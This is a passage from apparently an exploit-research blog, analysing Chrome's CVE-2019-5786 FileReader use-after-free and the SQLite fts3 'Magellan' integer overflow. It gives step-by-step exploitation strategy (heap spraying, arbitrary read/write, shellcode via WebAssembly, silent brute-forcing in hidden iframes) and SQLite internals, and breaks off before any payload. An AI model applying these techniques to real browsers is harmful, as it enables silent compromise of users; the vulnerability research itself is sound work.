      exception_state.ThrowDOMException(DOMExceptionCode::kDataCloneError,
                                        "ArrayBuffer at index " +
                                            String::Number(index) +
                                            " could not be transferred.");
      return ArrayBufferContentsArray();
    }
  }
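The flaw in this loop is that the visited set deduplicates wrapper objects, not the buffers they wrap. The following Python model sketches that logic. All class and function names are simplified stand-ins, and Python cannot represent freed memory, so the dangling pointer itself is only described in comments.

```python
class ArrayBuffer:
    """Underlying buffer; data becomes None once ownership is transferred."""

    def __init__(self, size):
        self.data = bytearray(size)

    def transfer(self):
        if self.data is None:
            return None                      # already detached ("neutered")
        contents, self.data = self.data, None
        return contents


class DOMArrayBuffer:
    """Script-visible wrapper around an ArrayBuffer."""

    def __init__(self, buffer):
        self.buffer = buffer


def transfer_all(wrappers):
    visited = set()
    contents = []
    for index, wrapper in enumerate(wrappers):
        if id(wrapper) in visited:           # dedup is per wrapper, not per buffer
            continue
        visited.add(id(wrapper))
        moved = wrapper.buffer.transfer()
        if moved is None:
            # Error path: everything transferred so far is discarded. In the
            # real code this frees memory that a wrapper can still reach.
            contents.clear()
            raise ValueError(f"ArrayBuffer at index {index} could not be transferred.")
        contents.append(moved)
    return contents


shared = ArrayBuffer(8)
first, second = DOMArrayBuffer(shared), DOMArrayBuffer(shared)
try:
    transfer_all([first, second])
    outcome = "ok"
except ValueError as exc:
    outcome = str(exc)
```

Passing the same wrapper twice is harmless because it is skipped; passing two distinct wrappers around one buffer reaches the error path after the first transfer has already succeeded.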

Exploitation

The vulnerability can be turned into an arbitrary read/write primitive by reclaiming the memory region pointed to by the dangling pointer with JavaScript TypedArrays and corrupting their length and backing store pointers. This can then be further utilized to achieve arbitrary code execution in the renderer process.

Memory Management in Chrome

There are several aspects of memory management in Chrome that affect the reliability of exploiting the vulnerability. Chrome uses PartitionAlloc to allocate the backing store of ArrayBuffers. This effectively separates ArrayBuffer backing stores from other kinds of allocations, making the vulnerability unexploitable if the region that is freed is below 2MiB in size, because PartitionAlloc will never reuse those allocations for other kinds of data. If the backing store size is above 2MiB, it is placed in a directly mapped region. Once freed, other kinds of allocations can reuse such a region. However, successfully reclaiming the freed region is only possible on 32-bit platforms, because on 64-bit platforms PartitionAlloc adds further randomness to its allocations via VirtualAlloc and mmap address hinting, on top of the ASLR slide.

On a 32-bit Windows 7 install, the address space of a fresh Chrome process is similar to the one shown below. Note that these addresses are not static and will differ by the ASLR slide of Windows. Bottom-up allocations start from the lower end of the address space; the last one is the reserved region starting at 36681000. Windows heaps, PartitionAlloc regions, the garbage-collected heaps of V8 and Chrome, and thread stacks are all placed among these regions in a bottom-up fashion. The backing store of the vulnerable ArrayBuffer will also reside here. An important thing to note is that Chrome makes a 512MiB reserved allocation (from 4600000 in the listing below) early on. This is done because the address space on x86 Windows systems is tight and fragments quickly, so Chrome reserves the region early to be able to hand it out for large contiguous allocations, such as ArrayBuffers, if needed. Once an ArrayBuffer allocation fails, Chrome frees this reserved region and tries again. The logic that handles this could complicate exploitation, so the exploit starts out by attempting a large (1GiB) ArrayBuffer allocation. This causes Chrome to free the reserved region and then fail the allocation again, since the address space has no gap of the requested size. While most OOM conditions kill the renderer process, ArrayBuffer allocation failures are recoverable from JavaScript via exception handling.

...
45f5000 45f8000 3000 MEM_PRIVATE MEM_COMMIT PAGE_READWRITE [................]
45f8000 4600000 8000 MEM_PRIVATE MEM_RESERVE
4600000 24600000 20000000 MEM_PRIVATE MEM_RESERVE
24600000 24601000 1000 MEM_PRIVATE MEM_COMMIT PAGE_READWRITE [...............j]
24601000 24602000 1000 MEM_PRIVATE MEM_RESERVE
...
36681000 36690000 f000 MEM_PRIVATE MEM_RESERVE
36690000 65fc0000 2f930000 MEM_FREE PAGE_NOACCESS Free
65fc0000 65fc1000 1000 MEM_IMAGE MEM_COMMIT PAGE_READONLY Image [dbghelp; "C:\Windows\system32\dbghelp.dll"]
65fc1000 66085000 c4000 MEM_IMAGE MEM_COMMIT PAGE_EXECUTE_READ Image [dbghelp; "C:\Windows\system32\dbghelp.dll"]
66085000 66086000 1000 MEM_IMAGE MEM_COMMIT PAGE_READWRITE Image [dbghelp; "C:\Windows\system32\dbghelp.dll"]
...
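The sizes in this listing can be checked with a few lines of arithmetic. The sketch below only considers the two regions that are visible in the listing (the 512MiB reservation and the large free region); the elided parts of the map are not modelled, and the region names are labels chosen for this example.

```python
MIB = 1 << 20

# (start, end) pairs copied from the address space listing.
regions = {
    "reserved": (0x04600000, 0x24600000),
    "free": (0x36690000, 0x65FC0000),
}


def size_mib(start, end):
    return (end - start) / MIB


reserved_mib = size_mib(*regions["reserved"])
free_mib = size_mib(*regions["free"])

# A 1GiB request needs a single contiguous gap of at least 1024MiB.
request_mib = 1024
fits = any(size_mib(*bounds) >= request_mib for bounds in regions.values())
```

The reservation is exactly 512MiB and the free region is roughly 761MiB. The two are not adjacent, so neither can satisfy a 1GiB request even after the reservation is released.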

Another important factor is the non-deterministic nature of the multiple garbage collectors that are involved in the managed heaps of Chrome. This introduces noise in the address space that is hard to control from JavaScript. Since the onprogress events used to trigger the vulnerability are also fired a non-deterministic number of times, and each event causes an allocation, the final location of the vulnerable ArrayBuffer is uncontrollable without the ability to trigger garbage collections on demand from JavaScript. The exploit uses the code shown below to invoke garbage collection. This makes it possible to free the results of onprogress events continuously, which helps in avoiding out-of-memory kills of the renderer process and also forces the dangling pointer created upon triggering the vulnerability to point to the lower end of the address space, somewhere into the beginning of the original 512MiB reserved region.

function force_gc() {
  // forces a garbage collection to avoid OOM kills and help with heap non-determinism
  try {
    var failure = new WebAssembly.Memory({initial: 32767});
  } catch(e) {
    // console.log(e.message);
  }
}

Exploitation steps

The exploit achieves code execution by the following steps:

  • Allocate a large (128MiB) string that will be used as the source of the Blob passed to FileReader. This allocation will end up in the free region following the bottom-up allocations (from 36690000 in the address space listing above).
  • Free the 512MiB reserved region via an oversized ArrayBuffer allocation, as discussed previously.
  • Invoke FileReader.readAsArrayBuffer. A number of onprogress events will be triggered, the last couple of which can return references to the same underlying ArrayBuffer if the timing of the events is right. This step can be repeated indefinitely until successful without crashing the process.
  • Free the backing store of the ArrayBuffer through one of the references. Going forward, another reference can be used to access the dangling pointer.
  • Reclaim the freed region by spraying the heap with recognizable JavaScript objects, interspersed with TypedArrays.
  • Look for the recognizable pattern through the dangling reference. This enables leaking the address of arbitrary objects by setting them as properties on the found object, then reading back the property value through the dangling pointer.
  • Corrupt the backing store of a sprayed TypedArray and use it to achieve arbitrary read/write access to the address space.
  • Load a WebAssembly module. This maps a read-write-executable memory region of 64KiB into the address space.
  • Traverse the JSFunction object hierarchy of an exported function from the WebAssembly module using the arbitrary read/write primitive to find the address of the read-write-executable region.
  • Replace the code of the WebAssembly function with shellcode and execute it by invoking the function.

Increasing reliability

A single run of the exploit (which uses the steps detailed above) yields a success rate of about 25%, but using a trick you can turn that into effectively 100% reliability. Abusing the site isolation feature of Chrome enables brute-forcing, as described in another post on this blog by Ki Chan Ahn (look for the section titled “Making a Stealth Exploit by abusing Chrome’s Site Isolation”). A site corresponds to a (scheme:host) tuple, therefore hosting the brute forcing wrapper script on one site which loads the exploit repeatedly in an iframe from another host will cause new processes to be created for each exploit attempt. These iframes can be hidden from the user, resulting in a silent compromise. Using multiple sites to host the exploit code, the process can be parallelized (subject to memory and site-isolation process limits). The exploit developed uses a conservative timeout of 10 seconds for one iteration without parallelization and achieves code execution on average under half a minute.
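To see why repeating a 25% attempt converges towards certainty, consider the following back-of-the-envelope sketch. It assumes that attempts are independent and that each succeeds with probability 0.25, which is a simplification; the function names are made up for this example.

```python
import math


def success_within(attempts, p=0.25):
    """Probability that at least one of `attempts` independent tries succeeds."""
    return 1 - (1 - p) ** attempts


def attempts_for(target, p=0.25):
    """Smallest number of tries whose cumulative success probability reaches target."""
    return math.ceil(math.log(1 - target) / math.log(1 - p))


after_four = success_within(4)      # roughly 68%
needed_for_99 = attempts_for(0.99)  # number of tries for a 99% chance
expected_attempts = 1 / 0.25        # mean of the geometric distribution
```

Under these assumptions, four attempts are needed on average, and 17 attempts give a better than 99% chance of at least one success.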

The entire exploit code can be found on our GitHub and it can be seen in action below.

Detection

The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.

Mitigation

Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.

Conclusion

It’s interesting to see exploits in the wild still targeting older platforms like Windows 7 x86. The 32-bit address space is so crowded that additional randomization is disabled in PartitionAlloc, and win32k lockdown is only available starting with Windows 8. The lack of mitigations on Windows 7 that are present in later versions of Windows therefore makes it a relatively soft target for exploitation.

Subscribers of our N-Day feed can leverage our in-depth analysis of critical vulnerabilities to defend themselves better, or use the provided exploits during internal penetration tests.

The post CVE-2019-5786: Analysis & Exploitation of the recently patched Chrome vulnerability appeared first on Exodus Intelligence.

Exploiting the Magellan bug on 64-bit Chrome Desktop

23 January 2019 at 05:59

Author: Ki Chan Ahn

In December 2018, the Tencent Blade Team released an advisory for a bug they named “Magellan”, which affected all applications using SQLite versions prior to 3.25.3. In their public disclosure they state that they successfully exploited Google Home using this vulnerability. Despite several weeks having passed since the initial advisory, no public exploit was released. We were curious about how exploitable the bug was and whether it could be exploited on 64-bit desktop platforms. Therefore, we set out to create an exploit targeting Chrome on 64-bit Ubuntu.

Background

The Magellan bug is a bug in the SQLite database library. It lies in the fts3 (Full Text Search) extension of SQLite, which was added in 2007. Chrome started to support the WebSQL standard (which is now deprecated) in 2010, so all versions between 2010 and the patched version should be vulnerable. The bug triggers when running a specific sequence of SQL queries, so only applications that can execute arbitrary SQL queries are vulnerable.

A short glance at the Vulnerability

In order to exploit a bug, the vulnerability has to be studied in detail. The bug was patched in commit 940f2adc8541a838. Looking at the commit, there were actually 3 bugs. We will look at the patch in the “fts3SegReaderNext” function, which is the bug that was actually used during exploitation. The other two bugs are very similar in nature, but slightly more complicated to trigger.
The gist of the patch is summarized below, with the bottom snippet being the patched version.

 1  static int fts3SegReaderNext(
 2    Fts3Table *p,
 3    Fts3SegReader *pReader,
 4    int bIncr
 5  ){
 6    int rc;                         /* Return code of various sub-routines */
 7    char *pNext;                    /* Cursor variable */
 8    int nPrefix;                    /* Number of bytes in term prefix */
 9    int nSuffix;                    /* Number of bytes in term suffix */
10
11    // snipped for brevity
12
13    pNext += fts3GetVarint32(pNext, &nPrefix);
14    pNext += fts3GetVarint32(pNext, &nSuffix);
15    if( nPrefix<0 || nSuffix<=0
16     || &pNext[nSuffix]>&pReader->aNode[pReader->nNode]
17    ){
18      return FTS_CORRUPT_VTAB;
19    }
20
21    if( nPrefix+nSuffix>pReader->nTermAlloc ){
22      int nNew = (nPrefix+nSuffix)*2;
23      char *zNew = sqlite3_realloc(pReader->zTerm, nNew);
24      if( !zNew ){
25        return SQLITE_NOMEM;
26      }
27      pReader->zTerm = zNew;
28      pReader->nTermAlloc = nNew;
29    }
30
31    rc = fts3SegReaderRequire(pReader, pNext, nSuffix+FTS3_VARINT_MAX);
32    if( rc!=SQLITE_OK ) return rc;
33
34    memcpy(&pReader->zTerm[nPrefix], pNext, nSuffix);

 1  static int fts3SegReaderNext(
 2    Fts3Table *p,
 3    Fts3SegReader *pReader,
 4    int bIncr
 5  ){
 6    int rc;                         /* Return code of various sub-routines */
 7    char *pNext;                    /* Cursor variable */
 8    int nPrefix;                    /* Number of bytes in term prefix */
 9    int nSuffix;                    /* Number of bytes in term suffix */
10
11    // snipped for brevity
12
13    pNext += fts3GetVarint32(pNext, &nPrefix);
14    pNext += fts3GetVarint32(pNext, &nSuffix);
15    if( nSuffix<=0
16     || (&pReader->aNode[pReader->nNode] - pNext)<nSuffix
17     || nPrefix>pReader->nTermAlloc
18    ){
19      return FTS_CORRUPT_VTAB;
20    }
21
22    /* Both nPrefix and nSuffix were read by fts3GetVarint32() and so are
23    ** between 0 and 0x7FFFFFFF. But the sum of the two may cause integer
24    ** overflow - hence the (i64) casts.  */
25    if( (i64)nPrefix+nSuffix>(i64)pReader->nTermAlloc ){
26      i64 nNew = ((i64)nPrefix+nSuffix)*2;
27      char *zNew = sqlite3_realloc64(pReader->zTerm, nNew);
28      if( !zNew ){
29        return SQLITE_NOMEM;
30      }
31      pReader->zTerm = zNew;
32      pReader->nTermAlloc = nNew;
33    }
34
35    rc = fts3SegReaderRequire(pReader, pNext, nSuffix+FTS3_VARINT_MAX);
36    if( rc!=SQLITE_OK ) return rc;
37
38    memcpy(&pReader->zTerm[nPrefix], pNext, nSuffix);

The patched version explicitly casts nPrefix and nSuffix to i64. Both are declared as int, so in the unpatched code the check nPrefix+nSuffix>pReader->nTermAlloc can be bypassed if the addition of the two values overflows. With the explicit casts, the check is evaluated correctly, and the allocation size on the following line is also calculated correctly. The new allocation is stored in pReader->zTerm and is later used on line 38 for a memcpy operation.
Now going back to the version before the patch, there is no explicit cast on line 21. Therefore, if the sum of the two values exceeds 2^31 - 1, the 32-bit result is negative and the inner code block is not executed. This means that the code does not allocate a new block that is big enough for the memcpy operation below. This has several implications, but to fully understand what the bug gives us, it is necessary to understand some core concepts of SQLite.
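The difference between the two checks can be reproduced with a short simulation. Python integers do not overflow, so the sketch below emulates a 32-bit int by hand, assuming the usual two's-complement wraparound (formally, signed overflow is undefined behaviour in C). The helper names are made up for this example.

```python
def to_int32(value):
    """Interpret the low 32 bits of value as a signed two's-complement int."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


def needs_realloc_unpatched(n_prefix, n_suffix, n_term_alloc):
    # Mirrors `nPrefix+nSuffix > nTermAlloc` evaluated in 32-bit signed arithmetic.
    return to_int32(n_prefix + n_suffix) > n_term_alloc


def needs_realloc_patched(n_prefix, n_suffix, n_term_alloc):
    # Mirrors `(i64)nPrefix+nSuffix > (i64)nTermAlloc`; no wraparound is possible.
    return n_prefix + n_suffix > n_term_alloc


wrapped_sum = to_int32(0x7FFFFFFF + 1)
skipped = not needs_realloc_unpatched(0x7FFFFFFF, 1, 10)
caught = needs_realloc_patched(0x7FFFFFFF, 1, 10)
```

With nPrefix set to 0x7FFFFFFF and nSuffix set to 1, the 32-bit sum wraps to -2147483648, so the unpatched comparison is false and the reallocation is skipped, while the 64-bit comparison correctly reports that the buffer is too small.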

SQLite Internals

SQLite is a C-language library that implements a small, fast, self-contained SQL database engine, and it claims to be the most used database engine in the world. SQLite implements most of the core SQL features, as well as some features unique to SQLite. This blog post will not go into every detail of the database engine, but will touch on the concepts that are relevant to the exploit.

SQLite Architecture

This is a summary of the Architecture of SQLite page on the official SQLite homepage. SQLite compiles each SQL statement into bytecode, which is then executed by a small virtual machine, much like an interpreter in a JavaScript engine. As such, it consists of a Tokenizer, a Parser, a Code Generator, and a Bytecode Engine. Every SQL query that is executed has to go through this pipeline. From an exploiter’s point of view, this means that if the bug occurs in the Bytecode Engine phase, there will be massive heap noise coming from the previous 3 stages, and the exploiter has to deal with it during Heap Feng-shui.

Another notable thing about SQLite is the use of B-Trees. SQLite uses B-Tree data structures to implement fast, efficient searches on the values in the database. One thing to keep in mind is that the actual data of the B-Trees is kept on disk, not in memory. This is a logical decision because some databases can get very large, and keeping all the data in memory would induce a large memory overhead. However, performing every search of a query on disk would introduce a huge disk IO overhead, and hence SQLite uses something called a Page Cache. The Page Cache is responsible for placing recently queried database pages in memory, so that they can be reused if another query searches for data on the same set of pages. The SQLite engine manages which pages are mapped into memory and which are evicted, so that disk and memory overhead are well balanced. This has another implication from an exploiter’s point of view. Most objects that are created during a single query execution are destroyed after the Bytecode Engine is done with the query, and the only thing that remains in memory is the data in the Page Cache. This means the actual data values living in the database tables are not a good target for Heap Feng-Shui, because most of the objects that represent the table data are thrown away immediately after query execution. In addition, the actual table data will only lie somewhere in the middle of the Page Cache, which is just slabs of multiple pages that hold parts of the database file saved on disk.

Full Text Search extensions

A brief introduction

The SQLite homepage describes Full-Text Search as the following.

FTS3 and FTS4 are SQLite virtual table modules that allows users to perform full-text searches on a set of documents. The most common (and effective) way to describe full-text searches is “what Google, Yahoo, and Bing do with documents placed on the World Wide Web”. Users input a term, or series of terms, perhaps connected by a binary operator or grouped together into a phrase, and the full-text query system finds the set of documents that best matches those terms considering the operators and groupings the user has specified.

Basically, Full-Text Search (FTS) is an extension to SQLite that enables it to query for search terms Google-style in an efficient way. The architecture and internals of the Full-Text Search engine are thoroughly described on the respective webpage. SQLite has continuously upgraded its FTS engine, from fts1 to fts5. The vulnerability occurs in the 3rd version of the extension, fts3. This specific version is also the only version that is allowed to be used in Chrome. All requests to use the other 4 versions are rejected by Chrome. Therefore, it is important to understand some main concepts behind fts3.

Here is a small example of how to issue an fts3 query.

CREATE VIRTUAL TABLE mail USING fts3(subject, body);

INSERT INTO mail(subject, body) VALUES('sample subject1', 'sample content');
INSERT INTO mail(subject, body) VALUES('sample subject2', 'hello world');

SELECT * FROM mail WHERE body MATCH 'sample';

This creates an fts table that uses version 3 of the Full-Text Search extension and inserts the content into it. In the above query, only one table, mail, is created explicitly, but under the hood several more tables are created (up to 5, depending on the fts version). Some of these tables will be discussed in detail in the following sections. During the INSERT statement, the VALUES are split into tokens, and each token has an index associated with it and is inserted into the respective tables. During the SELECT statement, the search keyword (‘sample’ in the above example) is looked up in the indexed token tables, and if the keyword is matched, the corresponding rows in the mail table are returned. This was a brief summary of how the full text search works under the hood. Now it is time to dig a little deeper into the elements that are related to the exploit.
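The tokenize-then-look-up idea can be sketched with a toy inverted index. This is only a conceptual model: it splits on whitespace and keeps everything in a dictionary, whereas fts3 uses its own tokenizers and the on-disk format described in the following sections. The function names are made up for this example.

```python
from collections import defaultdict


def build_index(rows):
    """Map each token to the set of row ids whose text contains it."""
    index = defaultdict(set)
    for rowid, text in rows.items():
        for token in text.lower().split():
            index[token].add(rowid)
    return index


def match(index, term):
    """Return the sorted row ids that contain the given term."""
    return sorted(index.get(term.lower(), ()))


bodies = {1: "sample content", 2: "hello world"}
index = build_index(bodies)
hits = match(index, "sample")
```

Here a lookup for sample returns only row 1, which corresponds to the single row that the SELECT statement above would return.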

Shadow Tables

In SQLite, there is something called Shadow Tables, which are basically just regular tables that exist to support the Virtual Table operations. These tables are created under the hood when issuing the CREATE VIRTUAL TABLE statement, and they store either the user INSERT’d data, or supplementary data that’s automatically inserted by the Virtual Table implementation. Since they are basically just regular tables, the content is accessible and modifiable just like any other table. An example of how the shadow tables are created is shown below.

sqlite> CREATE VIRTUAL TABLE mail USING fts3(subject, body);
sqlite> INSERT INTO mail(subject, body) VALUES('sample subject1', 'sample content');
sqlite> INSERT INTO mail(subject, body) VALUES('sample subject2', 'hello world');
sqlite> SELECT name FROM sqlite_master WHERE TYPE='table';
mail
mail_content
mail_segments
mail_segdir

For instance, when a user issues an INSERT/UPDATE/DELETE statement on an fts3 table, the virtual table implementation modifies the rows in the underlying shadow tables, and not the original table mail that was created by the CREATE VIRTUAL TABLE statement. This is because when the user issues an INSERT statement, the entire content of the value has to be split into tokens, and all those tokens and indexes need to be stored individually, not by the query issued by the user but by the C code implementation of fts3. These tokens and indexes are not stored as-is, but in a custom format defined by fts3 in order to pack all the values as compactly as possible. In the fts3 case, the token (or term) and the index are stored inside the tablename_segments and tablename_segdir shadow tables, with tablename being replaced by the actual table name that the user specified in the CREATE VIRTUAL TABLE statement. The entire sentence before it was split (sample subject, sample content in the above query) is stored in the tablename_content shadow table. The remaining two shadow tables are tablename_stat and tablename_docsize, which are support tables related to statistics and the total count of indexes and terms. These two tables are only created when using the fts4 extension. The most important table in this article is the tablename_segdir table, which will be used to trigger the vulnerability later on.

Variable Length Format

In the fts3 virtual table module, the shadow tables store data as SQLite supported data types, or otherwise they are all joined into one giant chunk of data and stored in a compact form as a BLOB. One such example is the table below.

CREATE TABLE %_segdir(
  level INTEGER,
  idx INTEGER,
  start_block INTEGER,               -- Blockid of first node in %_segments
  leaves_end_block INTEGER,          -- Blockid of last leaf node in %_segments
  end_block INTEGER,                 -- Blockid of last node in %_segments
  root BLOB,                         -- B-tree root node
  PRIMARY KEY(level, idx)
);

Some values are stored as INTEGER values, but the root column is stored as a BLOB. As mentioned before, the values are stored in a compact format in order to save space. String values are stored as-is, each preceded by a length value. But then, how is the length value stored? SQLite uses a format it calls the fts Variable Length Format. The algorithm works as follows.

  1. Represent the integer value in bits.
  2. Split the bits into groups of 7, starting from the least significant bit.
  3. Take the current lowest 7 bits. If they are not the last (most significant) 7 bits, set the most significant bit to 1 to form a full 8-bit value.
  4. Repeat step 3 for each of the following 7-bit groups.
  5. For the last (most significant) 7 bits, set the most significant bit to 0 to form a full 8-bit value.
  6. Append all of the bytes created in steps 3 and 5 to create one long byte string, which is the resulting Variable Length Integer.

SQLite uses this format because it wants to use only as many bytes as are needed to store the integer. It avoids padding with additional 0’s that would take up extra space if the integer were saved in a fixed-width format such as the standard C types. This format is something to keep in mind when constructing the payload in a later phase of exploitation.
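The steps above can be sketched as a pair of small functions. This is a minimal illustration of the encoding as described in this section, not SQLite's own code; the function names are chosen for this example.

```python
def encode_varint(value):
    """Encode a non-negative integer, least significant 7-bit group first."""
    if value < 0:
        raise ValueError("only non-negative integers are supported")
    out = bytearray()
    while True:
        low7 = value & 0x7F
        value >>= 7
        if value:
            out.append(low7 | 0x80)   # more groups follow: set the top bit
        else:
            out.append(low7)          # last group: top bit stays clear
            return bytes(out)


def decode_varint(data, pos=0):
    """Decode one varint starting at pos; return (value, next position)."""
    result = 0
    shift = 0
    while True:
        byte = data[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


small = encode_varint(5)            # fits in a single byte
medium = encode_varint(300)         # needs two bytes
large = encode_varint(0x7FFFFFFF)   # needs five bytes
```

Small values such as term lengths occupy a single byte, while 0x7FFFFFFF takes five bytes, four of which have the continuation bit set.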

Segment B-Tree Format

The Segment B-Tree is a B-Tree that is tailored to the needs of the fts extension. Since it is a complex format, only the elements related to the vulnerability will be discussed.

These are the fields in the tablename_segdir table. It stores most of the token and index data, and the most important field is the root member. We will focus on this member in detail.
The B-Tree consists of tree nodes and node data. A node can be an interior node, or a leaf. For simplicity’s sake, we will assume that the B-Tree has only a single node, and that node is the root node as well as a leaf node. The format of a leaf node is as follows.

Here is a quote borrowed from the SQLite webpage.

The first term stored on each node (“Term 1” in the figure above) is stored verbatim. Each subsequent term is prefix-compressed with respect to its predecessor. Terms are stored within a page in sorted (memcmp) order.

To give an example, following the figure above, let’s say Term 1 is apple. The Length of Term 1 is 5, and the content of Term 1 is apple. Doclist 1 follows the format of a Doclist, which is described here. Doclists are essentially just arrays of VarInt values, but they are not important for the discussion of the exploit and hence will be skipped. Let’s say Term 2 is april. The Prefix Length of Term 2 is 2, its Suffix Length is 3, and its Suffix Content is ril. As a last example, Term 3’s Prefix Length, Suffix Length, and Suffix Content are 5, 3, and pie respectively. This describes the term applepie. (Strictly speaking, terms are stored in memcmp order and each prefix is relative to the immediately preceding term, so applepie would be stored before april; the order used here is simplified for illustration.) This might seem a little messy in text, so the following is an illustration of the entire BLOB that was just described.

This is what gets saved into the root column of tablename_segdir when the user INSERTs “apple april applepie” into the fts table. As more content is inserted, the tree grows interior nodes and more leaves, and the BLOB data of the entire tree is stored in the tablename_segdir and tablename_segments shadow tables. This may not be entirely accurate, but this is basically what the indexing engine does, and how the engine stores all the search keywords and looks them up in a fast and efficient way. It should be noted that all the Length values within this leaf node are stored in the fts VarInt (Variable Length Integer) format described above.
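Prefix compression itself is easy to sketch. The snippet below sorts the terms in byte order, as the quoted SQLite documentation specifies, and emits a (prefix length, suffix) pair for each term relative to its predecessor. Doclists are left out, and the function names are made up for this example.

```python
def common_prefix_len(a, b):
    """Number of leading bytes shared by a and b."""
    count = 0
    for x, y in zip(a, b):
        if x != y:
            break
        count += 1
    return count


def prefix_compress(terms):
    """Return (prefix length, suffix) pairs for the terms in sorted order."""
    entries = []
    previous = b""
    for term in sorted(terms):            # bytes sort in memcmp order
        n_prefix = common_prefix_len(previous, term)
        entries.append((n_prefix, term[n_prefix:]))
        previous = term
    return entries


entries = prefix_compress([b"apple", b"april", b"applepie"])
```

In sorted order applepie comes directly after apple, so it is stored as prefix 5 plus pie, and april follows as prefix 2 plus ril.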

Revisiting the Bug

Now that the foundation has been laid out, it is time to revisit the bug to get a better understanding of it and of the (initial) primitives it provides us. But before we dig into the bug itself, let’s discuss shadow tables, and how SQLite treated them before they were hardened in version 3.26.0.
As mentioned above, shadow tables are (were) essentially just normal tables with no access control mechanism. As such, anyone who can execute arbitrary SQLite statements can read and modify shadow tables without any restrictions. This can become an issue when the virtual table implementation’s C code reads content from the shadow tables and parses it. This is exactly what the bug relies on. The bug requires a value in one of the shadow tables to be set to a specific value in order to trigger.
After the Magellan bug was reported to SQLite, the developers of SQLite deemed the ability to modify shadow tables too powerful, and in response decided to add a mitigation. This is the SQLITE_DBCONFIG_DEFENSIVE flag added in version 3.26.0. The actual bugs were fixed in 3.25.3, but the advisory recommends upgrading to 3.26.0 in case any other bug is lurking in the code, so that exploitation of such a bug can be blocked with the flag. Turning on this flag makes the shadow tables read-only to user-executed SQL queries, and makes it impossible for malicious SQL queries to modify data within the shadow tables. (This is not entirely true, because there are lots of places where SQL queries are dynamically created by the engine code itself, such as this function. SQL queries executed by the SQLite engine itself are immune to the SQLITE_DBCONFIG_DEFENSIVE flag, so some of these dynamic queries, which are constructed based on values supplied by the attacker’s SQL query, are potential bypass targets. These attacker-controlled values can include spaces and special characters without any issues when the entire value is surrounded by quotes, which makes them a possible SQL injection vector. Still, the SQLITE_DBCONFIG_DEFENSIVE flag serves as a good front-line defense.)

Now, back to the bug.

 1  static int fts3SegReaderNext(
 2    Fts3Table *p,
 3    Fts3SegReader *pReader,
 4    int bIncr
 5  ){
 6    int rc;                         /* Return code of various sub-routines */
 7    char *pNext;                    /* Cursor variable */
 8    int nPrefix;                    /* Number of bytes in term prefix */
 9    int nSuffix;                    /* Number of bytes in term suffix */
10
11    // snipped for brevity
12
13    pNext += fts3GetVarint32(pNext, &nPrefix);
14    pNext += fts3GetVarint32(pNext, &nSuffix);
15    if( nPrefix<0 || nSuffix<=0
16     || &pNext[nSuffix]>&pReader->aNode[pReader->nNode]
17    ){
18      return FTS_CORRUPT_VTAB;
19    }
20
21    if( nPrefix+nSuffix>pReader->nTermAlloc ){
22      int nNew = (nPrefix+nSuffix)*2;
23      char *zNew = sqlite3_realloc(pReader->zTerm, nNew);
24      if( !zNew ){
25        return SQLITE_NOMEM;
26      }
27      pReader->zTerm = zNew;
28      pReader->nTermAlloc = nNew;
29    }
30
31    rc = fts3SegReaderRequire(pReader, pNext, nSuffix+FTS3_VARINT_MAX);
32    if( rc!=SQLITE_OK ) return rc;
33
34    memcpy(&pReader->zTerm[nPrefix], pNext, nSuffix);
35    pReader->nTerm = nPrefix+nSuffix;
36    pNext += nSuffix;
37    pNext += fts3GetVarint32(pNext, &pReader->nDoclist);

To understand the code, the meaning of some variables should be explained. The fts3SegReaderNext function reads data from the fts3 B-Tree nodes, traverses each Term stored in a single node, and builds a full term based on the Term 1 string and the Prefix and Suffix data of the remaining Terms. pReader holds the information of the current Term being built. The pNext variable points into the BLOB data of the tablename_segdir->root column. We will assume that the BLOB contains data that represents a leaf node and contains exactly 2 Terms. pNext continuously advances as data is read in by the program code. The function fts3GetVarint32 reads an fts VarInt from the data pNext points to and stores it into a 32-bit variable. pReader->zTerm points to malloc’d space that is big enough to hold the term that was built on each iteration.
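The term-building loop can be modelled in a few lines of Python. This is a sketch of the logic described above, not a port of the SQLite code: doclists are treated as opaque bytes that are simply skipped, the sample doclist byte is a placeholder, and the sanity check on the prefix length is a stricter variant of the patched check, chosen for illustration.

```python
def read_varint(data, pos):
    """Decode one fts-style varint; return (value, next position)."""
    result = 0
    shift = 0
    while True:
        byte = data[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


def read_terms(node):
    """Rebuild every term stored in a single leaf node."""
    terms = []
    term = b""
    pos = 0
    while pos < len(node):
        n_prefix, pos = read_varint(node, pos)
        n_suffix, pos = read_varint(node, pos)
        # Reject lengths that point outside the node or the previous term.
        if n_suffix <= 0 or len(node) - pos < n_suffix or n_prefix > len(term):
            raise ValueError("corrupt node")
        term = term[:n_prefix] + node[pos:pos + n_suffix]
        pos += n_suffix
        n_doclist, pos = read_varint(node, pos)
        pos += n_doclist                      # skip the doclist bytes
        terms.append(term)
    return terms


DOCLIST = b"\x01\x00"                         # length 1 plus one placeholder byte
leaf = (b"\x00\x05apple" + DOCLIST
        + b"\x05\x03pie" + DOCLIST
        + b"\x02\x03ril" + DOCLIST)
terms = read_terms(leaf)
```

The leading zero byte is consumed as the prefix length of the first term. A node whose second term claims a prefix length of 0x7FFFFFFF is rejected by the check instead of being used as an index.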

Now let’s assume that the tablename_segdir->root contains BLOB data such as follows.

The range of Term 1 was expanded to include the leftmost byte, which is a fixed value of 0 but internally represents the Prefix Length of Term 1. In this layout, fts3SegReaderNext would be called 2 times. In the first call, it would allocate a 0x10 sized space for the string apple on line 23 of the previous code listing, and actually copy in the value on line 34. On the second call, it would add the length of the prefix and suffix, and check if it exceeds 5*2 on line 21. Since it doesn’t, it reuses the space created on the first call, and builds a complete term by copying in the prefix and the suffix on line 34. This is done for all terms stored within the current node, but in the above case, it is only called twice. Now consider the following case.

